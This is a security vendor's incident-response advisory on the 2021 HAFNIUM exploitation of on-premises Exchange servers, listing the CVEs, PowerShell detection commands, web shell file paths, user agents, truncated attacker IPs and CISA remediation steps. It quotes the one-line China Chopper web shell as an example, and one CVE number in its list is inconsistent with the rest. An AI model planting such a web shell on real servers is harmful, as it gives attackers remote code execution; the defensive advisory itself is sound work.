The attack against on-premises Microsoft Exchange Servers from Hafnium is widespread. Today, we sent a communication to our customers about what happened and how to respond.
Over the past 24 hours, it has become clear just how many organizations have been impacted by a Nation-State attack.
The attack against on-premises Microsoft Exchange Servers from Hafnium is widespread. Today, we sent a communication to our customers about what happened and how to respond.
We are taking the unusual step of sharing that customer communication in hopes that it helps other organizations.
What Happened
The recently exposed zero-day vulnerabilities in the on-premises or hybrid Microsoft Exchange Server products have provided attackers with an attack vector affecting the Internet Information Service (IIS) component of the target (victim) servers, providing an opportunity for attackers to exploit these vulnerabilities in order to steal data or spawn web shells to establish persistence on the network.
It should be noted that Microsoft’s hosted Exchange Online, Office365, and Microsoft 365 services are not affected, though third-party cloud service providers who operate their own instances may be at risk.
The Microsoft Threat Intelligence Center (MSTIC) has attributed these attacks to the state-sponsored group HAFNIUM operated out of China.
The goal of this document is to provide Critical Insight clients with actionable detection, confirmation, and remediation steps they can use to respond to incidents that they or Critical Insight find in their environment. Note that if Critical Insight has detected an indicator or event in your environment, we have already reached out. If we have not actively contacted your organization, Critical Insight still recommends administrators run the tests, because depending on the organization’s network architecture and scope of detection services, our MDR (Managed Detection & Response) service or your in-line network inspection systems may not be able to see indicators or related traffic.
The Vulnerabilities
- CVE-2021-26855 – a server-side request forgery vulnerability that may allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
- CVE-2021-26857 – insecure deserialization vulnerability in the Unified Messaging Service that may allow untrusted user-controllable data to be deserialized by a program, allowing the attacker the ability to run code as SYSTEM on the Exchange server. This does require admin permission or another vulnerability to exploit.
- CVE-2021-26858 – post-authentication arbitrary file write vulnerability in Exchange allowing an authenticated attacker to write a file to any path on the server.
- CVE-2021-27605 – post-authentication arbitrary file write vulnerability in Exchange similar to the one above.
These vulnerabilities are being “chained” together and used in sequence to provide outside attackers with direct access to servers and infrastructure, and in some cases is enabling the attackers to exfiltrate mail data to a remote server outside of the network. This is a far-reaching attack which can be launched from any internet-connected computer, and is likely to penetrate most port-blocking firewalls and network IPS systems. Organizations operating Exchange servers that are hosted behind a Web Application Firewall or other firewall/load-balancer device which publishes a limited Outlook Web Application front-end may be less susceptible to compromise but should still closely examine their systems for the Indicators of Compromise (IOCs) to determine if they are affected.
These vulnerabilities have been addressed in a patch released on Tuesday, March 2. Links directly to these patches may be found by navigating to:
What is a Web Shell
A Web Shell is a piece of malicious code dropped by an attacker on an asset, in this instance an IIS web server hosting OWA, which provides remote access and code execution functions on the compromised server. These web shells may then be leveraged to execute commands, steal data, or use the server as a launchpad for further attacks. A common web shell that Critical Insight has seen leveraged against CVE-2021-27065 is the popular “China Chopper” web shell being leveraged against the “CMD=Set-OabVirtualDirectory.ExternalUrl” parameter:
<%@ Page Language=”Jscript”%><%eval(Request.Item[“Random word here”], “unsafe”);%>
Critical Insight Detection & Response
Critical Insight has detections in place to assist with identifying the attacks based on these vulnerabilities. We are also conducting threat hunting activity through Windows logs for associated activity. We are asking all clients that see suspicious indicators outside of Critical Insight resources to forward those to us so we can assist with conducting focused investigations.
Actionable Detection Activities for Administrators
- CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs
- These logs are located in the following directory:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy
- Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/*
- Example PowerShell command to find these log entries (this command is a single line):
Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object { $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | select DateTime, AnchorMailbox
If activity is detected, the logs specific to the application noted in the AnchorMailbox path can be used to help determine what actions were taken. These logs may be found in %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging
- CVE-2021-26858 exploitation can be detected via the Exchange log files
- C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog
- Files should only be downloaded to the directory %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp
- In case of exploitation, files are downloaded to other directories (UNC or local paths). If files are present in other directories than ..\OAB\Temp this may be an indicator of exploitation.
- Windows command to search for potential exploitation (this command is a single line):
findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"
- CVE-2021-26857 exploitation can be detected via the Windows Application event logs
- Exploitation of this deserialization bug will create Application events with the following properties:
- Source: MSExchange Unified Messaging
- EntryType: Error
- Event Message Contains: System.InvalidCastException
- Following is a PowerShell command to query the Application Event Log for these log entries (this command is a single line):
Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }
- CVE-2021-27065 exploitation can be detected via the following Exchange log files:
- C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server
- All Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid URIs.
- Following is a PowerShell command to search for potential exploitation (this command is a single line):
- Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'
- Volexity observed these user-agents in conjunction with exploitation to /ecp/ URLs:
- ExchangeServicesClient/0.0.0.0
- python-requests/2.19.1
- python-requests/2.25.1
System administrators should also take the steps listed to determine if there are any suspicious web log user-agents at the /owa/auth/Current location (though these should not be taken as definitive IOCs):
- DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduck...)
- facebookexternalhit/1.1+(+http://www.facebook.com/extern...)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/sp...)
- Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.ht...)
- Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
- Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
- Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/...)
- Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)
- Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36
Confirming Web Shell Activity:
Volexity has observed indicators that are consistent with webserver breaches that can be used to look on server disks and in weblogs for access to or the presence of ASPX files at the following paths:
- \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders)
- \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ <any aspx file in this folder or subfolders>
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ <folder with version number>\<any aspx file in this folder or subfolders>
Network Indicators – Attacker IPs
Thought not exhaustive, these are some IPs that have been used by attackers to exploit the vulnerabilities in these servers. These IPs are tied to VPS and VPN services. There have also been indicators of attackers using TOR services:
- 77.192.219
- 140.114.110
- 250.191.110
- 61.246.56
- 28.14.163
- 230.221.198
- 99.168.251
- 250.151.72
- 81.208.169
- 160.69.66
- 56.98.146
- 254.43.18
- 92.205.81
Remediation & Next Steps
Once indicators are confirmed, simply applying the patch will not eliminate an already established presence on an affected server. CISA recommends taking the following actions:
- Immediately disconnect Microsoft Exchange on-premises servers.
- It is highly recommended that the server is NOT powered off and that it be retained for further forensic activity.
- Notify any insurance or third-party forensic assets available to your organization.
- Identify and remove all threat actor-controlled accounts and identified persistence mechanisms.
If your organization decides to disengage the Exchange Server from your network, DO simply disconnect it and preferably DO NOT shut it down. There may be the potential need for forensic response and that server will have memory and other artifacts that can be destroyed if the server is shut it down.
- Preserve all logs and artifacts. If your team is preparing to build a new or replacement server, preserve the existing systems in the event forensic analysis is necessary in the future.
- CISA has released a National Cyber Awareness System Alert (AA21-062A) for these vulnerabilities. (https://us-cert.cisa.gov/ncas/alerts/aa21-062a) If sufficient indicators of compromise are found to suggest a breach, Critical Insight recommends following the CISA guidance, though this may incur operational impacts and email service disruptions.
- FOR FEDERAL AGENCIES ONLY: DHS released an Emergency Directive for Federal Agencies stating if the above artifacts are found to shut the server down. https://cyber.dhs.gov/ed/21-02/.
Current detections for exploitation of these vulnerabilities resides in Microsoft’s Defender and Azure products, and the Critical Insight MDR service. Administrators may also review logs to determine suspicious activities related to these four exploits. Microsoft has updated its blog about these vulnerabilities with information on how to scan Exchange log files for related IOCs:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log
Questions and Incident Assistance
We hope the information provided here has been valuable to you and your organization in identifying and containing these newly emerged threats and vulnerabilities. If you or your organization have questions or are in need of incident assistance, please contact Critical Insight through your MDR Security Strategist or Account Executive, your Virtual CISO, or by calling the Critical Insight Critical Response phone number at +1-800-604-4810.